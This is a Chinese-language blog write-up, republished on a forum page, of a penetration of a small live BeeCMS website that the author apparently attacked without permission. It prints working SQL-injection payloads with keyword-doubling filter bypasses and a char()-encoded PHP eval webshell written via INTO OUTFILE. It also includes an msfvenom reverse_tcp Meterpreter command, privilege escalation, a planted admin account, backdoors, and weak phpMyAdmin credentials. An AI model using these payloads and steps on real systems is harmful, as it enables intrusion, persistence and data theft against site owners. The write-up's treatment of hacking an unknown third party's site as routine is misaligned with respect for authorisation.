0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

记录某一次无意点开的一个小网站的渗透过程

工程师邓生 来源:CSDN 作者:Deilty 2022-09-09 09:09 次阅读

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

一、渗透过程

无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以

方法一

1.通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点

2.一把梭,发现并没有,使用脚本也没有绕过

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.对shell部分进行编码

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。

ps:这里的写入路径纯属盲猜,运气好,默认目录

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一样成功写入

1.写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陆,然后就是后台找上传了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么问题,用这个没有成功,那么只能通过大马提权了

方法二

1.上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2.访问大马

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等

4.创建admin权限账号之后,登陆服务器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、总结 1.前台sql注入获取用户名密码,进入后台找上传 2.SQL注入语句写入一句话 3.phpmyadmin一句话getshell 4.上传大马提权

至此,渗透结束。


审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • SQL
    SQL
    +关注

    关注

    1

    文章

    759

    浏览量

    44063
  • 编码
    +关注

    关注

    6

    文章

    935

    浏览量

    54759
  • ASCII
    +关注

    关注

    5

    文章

    172

    浏览量

    35043

原文标题:实战 | 一次小网站渗透过程

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    一次电源与二电源有什么不同

    在电力系统和电子设备的供电领域中,一次电源与二电源是两至关重要的概念。它们各自承担着不同的功能和角色,共同确保电力供应的稳定性和可靠性。本文将对一次电源与二
    的头像 发表于 10-10 14:10 1128次阅读

    一次电池分类以及应用场景详解

    01 一次电池简介 一次电池即原电池(primarycell、primarybattery)(俗称干电池),是放电后不能再充电使其复原的电池,通电电池有正极、负极电解以及容器和隔膜等组成。 一次电池
    的头像 发表于 09-30 17:52 443次阅读
    <b class='flag-5'>一次</b>电池分类以及应用场景详解

    无线时钟秒转一次思路怎么设置

    创建无线时钟,使其每秒转动一次,涉及到多个领域的知识,包括电子工程、无线通信、编程和机械设计。 1. 项目概述 无线时钟每秒转动一次的项目可以分为以下几个主要部分: 机械设计 :设
    的头像 发表于 09-07 09:21 257次阅读

    labview如何做到一次触发采集一次

    最近在做一个电压测试模块,要求是在一个时间段内,出现上升沿触发采集,并且只采集一次,采集次数为出现上升沿的次数,采集时间,采样率及单
    发表于 08-07 10:16

    记录一次使用easypoi时与源码博弈的过程

    、背景介绍 最近刚刚接手了保险线之声平台的开发和维护工作,第一个需要修复的问题是:平台的事件导出成excel功能在经过一次上线之后突然不可用了,于是就开始了几轮痛苦的排查以及与源码
    的头像 发表于 07-03 16:33 294次阅读
    <b class='flag-5'>记录</b><b class='flag-5'>一次</b>使用easypoi时与源码博弈的<b class='flag-5'>过程</b>

    一次消谐器的构造

    今天来给大家介绍一下一次消谐器的构造。 一次消谐器是种用于消除电力系统中的谐波及无功功率的装置,它由感性元件和电容器构成,感性元件用于吸收系统中的无功功率,而电容器则用于补偿系统中的感性无功功率
    的头像 发表于 05-30 14:55 363次阅读

    鸿蒙OS开发:【一次开发,多端部署】(多天气)项目

    本示例展示天气应用界面,包括首页、城市管理、添加城市、更新时间弹窗,体现一次开发,多端部署的能力。
    的头像 发表于 05-20 14:59 801次阅读
    鸿蒙OS开发:【<b class='flag-5'>一次</b>开发,多端部署】(<b class='flag-5'>一</b>多天气)项目

    什么是一次配电系统和二配电系统?有何区别?

    一次配电系统和二配电系统是电力供应网络中的两不同层级,它们在电力传输、分配和控制方面发挥着各自的作用。
    的头像 发表于 04-30 17:28 6176次阅读

    基波是一次谐波么 基波与一次谐波的区别

    基波是一次谐波么 基波与一次谐波的区别  基波和一次谐波是两不同的概念。 基波是在谐波分析中指的是频率最低且没有任何谐波成分的波形,它是构成复杂波形的基础。在正弦波中,基波就是正弦波
    的头像 发表于 04-08 17:11 6393次阅读

    电流变换器是一次输入电流二输出

    ,我们来看电流变换器的工作原理。电流变换器通过将一次输入电流经过必要的电子元件、电路和算法处理后,将其转化为二输出电流。这个过程通常分为两步骤:采样和变换。在采样阶段,变换器对输入
    的头像 发表于 01-19 14:32 1336次阅读

    DDoS攻击规模最大的一次

    有史以来DDoS攻击规模最大的是哪一次? Google Cloud团队在2017年9月披露了一次此前未公开的DDoS攻击,其流量达 2.54Tbps,是迄今为止有记录以来最大的DDoS攻击。 在同时
    的头像 发表于 01-18 15:39 434次阅读

    记录一次K8s pod被杀的排查过程

    今天下午运维反馈说我们这一个pod天重启了8,需要排查下原因。看Kiban日志,jvm没有抛出过任何错误,服务就直接重启了。
    的头像 发表于 01-18 09:57 703次阅读

    一次消谐器类型与选择

    一次消谐器:类型与选择 在电力系统中的设备运行过程中,谐波的存在往往会对设备产生不良影响。为了解决这问题,消谐器应运而生。今天,我们将为大家详细介绍一次消谐器的类型与选择。
    的头像 发表于 01-09 10:14 542次阅读

    求助:需要特定物品发出的声音记录系统【某一种声音的计数器】,酬劳感谢

    各位大神,小弟有需求,就是要记录某一种声音的发生次数,这个声音发生是频率在1秒钟左右,但是不是持续发生,是某一时间发生。 就是当这个声音
    发表于 12-24 11:58

    一次消谐和二消谐有什么区别

    一次消谐和二消谐是在交流电电路中进行的两种储能元件的选择,旨在改善电流和电压的波动问题。下面将详细介绍一次消谐和二消谐的区别。 一次消谐
    的头像 发表于 12-20 14:48 1591次阅读